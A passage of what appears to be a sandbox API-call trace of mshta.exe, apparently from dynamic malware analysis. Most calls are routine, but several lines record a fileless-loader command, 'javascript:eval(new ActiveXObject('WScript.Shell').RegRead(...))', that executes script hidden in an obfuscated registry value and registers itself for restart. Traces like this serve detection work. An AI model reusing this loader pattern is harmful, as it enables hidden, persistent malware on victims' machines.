samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.097] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.097] RegCloseKey (hKey=0x0) returned 0x6 [0065.097] RegCloseKey (hKey=0x0) returned 0x6 [0065.097] RegCloseKey (hKey=0x98) returned 0x0 [0065.097] RegCloseKey (hKey=0x94) returned 0x0 [0065.097] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0065.099] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.099] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x9c) returned 0x0 [0065.099] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.099] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.099] RegCloseKey (hKey=0x0) returned 0x6 [0065.100] RegCloseKey (hKey=0x0) returned 0x6 [0065.100] RegCloseKey (hKey=0x98) returned 0x0 [0065.100] RegCloseKey (hKey=0x9c) returned 0x0 [0065.100] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x9c) returned 0x0 [0065.100] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.100] RegOpenKeyExW (in: 
hKey=0x98, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.100] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.100] RegCloseKey (hKey=0x0) returned 0x6 [0065.100] RegCloseKey (hKey=0x0) returned 0x6 [0065.100] RegCloseKey (hKey=0x9c) returned 0x0 [0065.100] RegCloseKey (hKey=0x98) returned 0x0 [0065.100] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.101] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x9c) returned 0x0 [0065.101] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.101] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.101] RegCloseKey (hKey=0x0) returned 0x6 [0065.101] RegCloseKey (hKey=0x0) returned 0x6 [0065.101] RegCloseKey (hKey=0x98) returned 0x0 [0065.101] RegCloseKey (hKey=0x9c) returned 0x0 [0065.101] GetSystemMetrics (nIndex=68) returned 4 [0065.101] GetSystemMetrics (nIndex=69) returned 4 [0065.102] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 [0065.102] GetSystemDefaultLCID () returned 0x409 [0065.103] GetVersionExW (in: lpVersionInformation=0x18f0ec*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77c6e36c, dwMinorVersion=0x77c6e0d2, dwBuildNumber=0x7502afd8, dwPlatformId=0x0, 
szCSDVersion="") | out: lpVersionInformation=0x18f0ec*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.103] GetUserDefaultUILanguage () returned 0x409 [0065.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x18f03c, cchData=16 | out: lpLCData="\x03") returned 16 [0065.202] GetKeyboardLayoutList (in: nBuff=32, lpList=0x18f06c | out: lpList=0x18f06c) returned 1 [0065.202] GetSystemMetrics (nIndex=4096) returned 0 [0065.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f190 | out: phkResult=0x18f190*=0x9c) returned 0x0 [0065.202] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f194 | out: phkResult=0x18f194*=0x98) returned 0x0 [0065.202] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f150 | out: phkResult=0x18f150*=0x0) returned 0x2 [0065.203] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f150 | out: phkResult=0x18f150*=0x0) returned 0x2 [0065.203] RegCloseKey (hKey=0x0) returned 0x6 [0065.203] RegCloseKey (hKey=0x0) returned 0x6 [0065.203] RegCloseKey (hKey=0x9c) returned 0x0 [0065.203] RegCloseKey (hKey=0x98) returned 0x0 [0065.203] GetModuleFileNameW (in: hModule=0x74af0000, lpFilename=0x18eff8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e [0065.203] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x3e) returned 0x623cf0 [0065.203] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0065.203] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0065.203] RegisterClipboardFormatA 
(lpszFormat="Link Source") returned 0xc00d [0065.203] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0065.203] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0065.203] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc16c [0065.203] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc16d [0065.203] GetDC (hWnd=0x0) returned 0x100109eb [0065.203] SHCreateShellPalette (hdc=0x0) returned 0xe0806be [0065.204] GetPaletteEntries (in: hpal=0xe0806be, iStart=0x0, cEntries=0x100, pPalEntries=0x7502a494 | out: pPalEntries=0x7502a494) returned 0x100 [0065.204] SHGetInverseCMAP (in: pbMap=0x75028a7c, cbMap=0x4 | out: pbMap=0x75028a7c) returned 0x0 [0065.204] GetDeviceCaps (hdc=0x100109eb, index=38) returned 32409 [0065.204] ReleaseDC (hWnd=0x0, hDC=0x100109eb) returned 1 [0065.204] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20a) returned 0x62e988 [0065.204] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2000) returned 0x62f3a0 [0065.205] GetCurrentProcessId () returned 0x5bc [0065.205] _vsnprintf (in: _DstBuf=0x18f53c, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x18f204 | out: _DstBuf="#MSHTML#PERF#000005BC") returned 21 [0065.205] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#000005BC") returned 0x0 [0065.205] GetVersionExW (in: lpVersionInformation=0x18f220*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x613660, dwMinorVersion=0x100, dwBuildNumber=0x62db88, dwPlatformId=0x610000, szCSDVersion="A") | out: lpVersionInformation=0x18f220*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.205] GetModuleHandleW (lpModuleName="advapi32") returned 0x77710000 [0065.205] GetProcAddress (hModule=0x77710000, lpProcName="EventWrite") returned 0x77ca0c59 [0065.205] GetProcAddress (hModule=0x77710000, lpProcName="EventRegister") returned 
0x77c7f6ba [0065.205] GetProcAddress (hModule=0x77710000, lpProcName="EventUnregister") returned 0x77c99241 [0065.206] EtwEventRegister () returned 0x0 [0065.206] EtwRegisterTraceGuidsW () returned 0x0 [0065.206] EtwRegisterTraceGuidsW () returned 0x0 [0065.206] EtwEventRegister () returned 0x0 [0065.206] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Office14\\outllib.dll", lpdwHandle=0x18efec | out: lpdwHandle=0x18efec) returned 0x0 [0065.207] GetModuleHandleW (lpModuleName=0x0) returned 0x970000 [0065.207] GetModuleFileNameW (in: hModule=0x970000, lpFilename=0x18eff8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.207] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.209] GetCurrentProcessId () returned 0x5bc [0065.209] GetCurrentProcessId () returned 0x5bc [0065.211] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xbc [0065.211] GetLastError () returned 0xb7 [0065.211] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xc0 [0065.211] MapViewOfFile (hFileMappingObject=0xc0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1a0000 [0065.288] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a1de8 | out: hHeap=0x5a0000) returned 1 [0065.288] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a0e78 | out: hHeap=0x5a0000) returned 1 [0065.288] RegCloseKey (hKey=0x42) returned 0x0 [0065.288] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0065.289] GetProcAddress (hModule=0x76d30000, lpProcName="RegisterApplicationRestart") returned 0x76d6b53c [0065.289] lstrlenA (lpString="\"javascript:eval(new 
ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"") returned 102 [0065.289] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xce) returned 0x5a1de8 [0065.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x612af2, cbMultiByte=-1, lpWideCharStr=0x5a1de8, cchWideChar=103 | out: lpWideCharStr="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"") returned 103 [0065.289] RegisterApplicationRestart (pwzCommandline="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"", dwFlags=0x0) returned 0x0 [0065.289] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a1de8 | out: hHeap=0x5a0000) returned 1 [0065.289] GetProcAddress (hModule=0x74af0000, lpProcName="RunHTMLApplication") returned 0x74b4e710 [0065.289] GetCommandLineW () returned="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"" [0065.290] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xd2) returned 0x6352a8 [0065.290] OleInitialize (pvReserved=0x0) returned 0x0 [0065.602] IsWindow (hWnd=0x0) returned 0 [0065.602] RegisterClassW (lpWndClass=0x18f8a4) returned 0xc059 [0065.603] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x970000, lpParam=0x75029680) returned 0x50116 [0065.604] NtdllDefWindowProc_W () returned 0x0 [0065.604] NtdllDefWindowProc_W () returned 0x1 [0065.605] NtdllDefWindowProc_W () returned 0x0 [0065.608] NtdllDefWindowProc_W () returned 0x0 [0065.608] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x50116, hMenu=0x0, hInstance=0x970000, lpParam=0x75029680) 
returned 0x40162 [0065.609] NtdllDefWindowProc_W () returned 0x0 [0065.609] NtdllDefWindowProc_W () returned 0x1 [0065.609] NtdllDefWindowProc_W () returned 0x0 [0065.609] NtdllDefWindowProc_W () returned 0x0 [0065.610] SetWindowLongW (hWnd=0x40162, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0065.610] NtdllDefWindowProc_W () returned 0x0 [0065.610] NtdllDefWindowProc_W () returned 0x0 [0065.610] NtdllDefWindowProc_W () returned 0x0 [0065.611] NtdllDefWindowProc_W () returned 0x0 [0065.611] NtdllDefWindowProc_W () returned 0x0 [0065.611] NtdllDefWindowProc_W () returned 0x0 [0065.611] SetWindowPos (hWnd=0x40162, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0065.611] NtdllDefWindowProc_W () returned 0x0 [0065.611] NtdllDefWindowProc_W () returned 0x0 [0065.612] NtdllDefWindowProc_W () returned 0x0 [0065.612] NtdllDefWindowProc_W () returned 0x0 [0065.613] NtdllDefWindowProc_W () returned 0x0 [0065.614] SendMessageW (hWnd=0x40162, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0065.614] NtdllDefWindowProc_W () returned 0x0 [0065.614] NtdllDefWindowProc_W () returned 0x0 [0065.619] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xd2) returned 0x63b2d8 [0065.619] PathRemoveArgsW (in: pszPath="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"" | out: pszPath="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"") [0065.621] PathRemoveBlanksW (in: pszPath="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"" | out: pszPath="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"") [0065.621] PathUnquoteSpacesW (in: lpsz="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"" | out: lpsz="javascript:eval(new 
ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 1 [0065.623] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppmk=0x18f904*=0x0, dwFlags=0x1 | out: ppmk=0x18f904*=0x620638) returned 0x0 [0065.720] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63b2d8 | out: hHeap=0x610000) returned 1 [0065.720] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f140 [0065.720] CoCreateInstance (in: rclsid=0x74c29770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74cab75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x750296d4 | out: ppv=0x750296d4*=0x6421f8) returned 0x0 [0065.722] DllGetClassObject (in: rclsid=0x640bd0*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ebb4 | out: ppv=0x18ebb4*=0x75028cb0) returned 0x0 [0065.722] IClassFactory:CreateInstance (in: This=0x75028cb0, pUnkOuter=0x0, riid=0x18f560*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18eba0 | out: ppvObject=0x18eba0*=0x6421f8) returned 0x0 [0065.722] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2a8) returned 0x63de18 [0065.822] GetCurrentThreadId () returned 0x2a8 [0065.931] RegisterClassExW (param_1=0x18ea4c) returned 0xc16a [0065.931] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc16a, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x74af0000, lpParam=0x0) returned 
0x202ac [0065.932] GetWindowLongW (hWnd=0x202ac, nIndex=-20) returned 0 [0065.932] NtdllDefWindowProc_W () returned 0x1 [0065.932] NtdllDefWindowProc_W () returned 0x0 [0065.932] NtdllDefWindowProc_W () returned 0x0 [0065.932] NtdllDefWindowProc_W () returned 0x0 [0065.932] NtdllDefWindowProc_W () returned 0x0 [0065.933] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f158 [0065.933] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f170 [0065.933] CreateCompatibleDC (hdc=0x0) returned 0x3010a0f [0065.933] GetDeviceCaps (hdc=0x3010a0f, index=90) returned 96 [0065.933] GetDeviceCaps (hdc=0x3010a0f, index=88) returned 96 [0065.933] GetSystemMetrics (nIndex=68) returned 4 [0065.933] GetSystemMetrics (nIndex=69) returned 4 [0065.933] GetSystemMetrics (nIndex=2) returned 17 [0065.933] GetSystemMetrics (nIndex=3) returned 17 [0065.933] GetStockObject (i=13) returned 0x18a002e [0065.933] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x18a002e [0065.933] GetTextMetricsW (in: hdc=0x3010a0f, lptm=0x18eae4 | out: lptm=0x18eae4) returned 1 [0065.933] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x18a002e [0065.933] DeleteObject (ho=0x18a002e) returned 1 [0065.933] GetSystemDefaultLCID () returned 0x409 [0065.933] GetUserDefaultLCID () returned 0x409 [0065.933] GetACP () returned 0x4e4 [0065.933] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x18ea58, cchData=41 | out: lpLCData="1") returned 2 [0065.933] _wtoi (_String="1") returned 1 [0065.934] RegCloseKey (hKey=0x0) returned 0x6 [0065.934] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x18eaac, cchData=16 | out: lpLCData="0123456789") returned 11 [0065.934] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7502b038, fWinIni=0x0 | out: pvParam=0x7502b038) returned 1 [0065.934] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x18eb20, fWinIni=0x0 | out: pvParam=0x18eb20) returned 1 [0065.934] RtlAllocateHeap 
(HeapHandle=0x610000, Flags=0x0, Size=0xc0) returned 0x641ea0 [0065.934] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f188 [0065.934] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xa4) returned 0x63e0c8 [0065.934] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x6333c8 [0065.934] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1c) returned 0x63aac0 [0065.934] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x6290e0 [0065.934] GetSystemWindowsDirectoryW (in: lpBuffer=0x18e92c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0065.934] lstrlenW (lpString="C:\\Windows") returned 10 [0065.935] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0065.935] CreateActCtxW (pActCtx=0x18e908) returned 0x63e17c [0065.936] ActivateActCtx (in: hActCtx=0x63e17c, lpCookie=0x18e8d8 | out: hActCtx=0x63e17c, lpCookie=0x18e8d8) returned 1 [0065.936] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x754a0000 [0065.952] DeactivateActCtx (dwFlags=0x0, ulCookie=0x127a0001) returned 1 [0065.952] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0065.953] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0065.953] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0065.953] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0065.953] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e538, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.953] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18e740, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.954] GetCurrentProcess () returned 0xffffffff [0065.954] GetModuleBaseNameW (in: 
hProcess=0xffffffff, hModule=0x0, lpBaseName=0x18e948, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9 [0065.954] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.954] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x6333e8 [0065.954] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0065.954] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x18e524, pvData=0x18e530, pcbData=0x18e52c*=0x4 | out: pdwType=0x18e524*=0x0, pvData=0x18e530, pcbData=0x18e52c*=0x4) returned 0x2 [0065.955] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18e49c | out: phkResult=0x18e49c*=0x154) returned 0x0 [0065.955] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18e4a0 | out: phkResult=0x18e4a0*=0x150) returned 0x0 [0065.955] RegOpenKeyExW (in: hKey=0x150, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x18e45c | out: phkResult=0x18e45c*=0x0) returned 0x2 [0065.955] RegOpenKeyExW (in: hKey=0x154, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x18e45c | out: phkResult=0x18e45c*=0x0) returned 0x2 [0065.955] RegCloseKey (hKey=0x0) returned 0x6 [0065.955] RegCloseKey (hKey=0x0) returned 0x6 [0065.955] RegCloseKey (hKey=0x154) returned 0x0 [0065.955] RegCloseKey (hKey=0x150) returned 0x0 [0065.956] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x97c) returned 0x6421f8 [0065.956] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x480) returned 0x642b80 [0065.956] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.956] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 
71582788 [0065.956] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.956] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.956] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x63b318 [0065.956] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x63e9c8 [0065.957] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x63ea20 [0065.957] GetCurrentThreadId () returned 0x2a8 [0065.957] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f248 [0065.957] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2c) returned 0x62d718 [0065.957] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x80) returned 0x63ea78 [0065.957] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc169 [0065.957] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x633408 [0065.958] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1 [0065.959] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x75028cd4, dwReserved=0x0 | out: ppSM=0x75028cd4*=0x63eb00) returned 0x0 [0065.964] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x64) returned 0x63eb68 [0066.043] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x643448 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x28) returned 0x62d030 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x633428 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x629130 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x629180 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x6434a0 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x64) returned 0x643508 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x6291d0 [0066.044] RtlAllocateHeap 
(HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x643578 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xec) returned 0x643850 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x629220 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x629270 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x6292c0 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x6435e0 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x643948 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x629310 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x629360 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x90) returned 0x6439b0 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x140) returned 0x643a48 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8) returned 0x63b870 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x28) returned 0x62d060 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x633448 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xd0) returned 0x63cb90 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x38) returned 0x63b370 [0066.045] 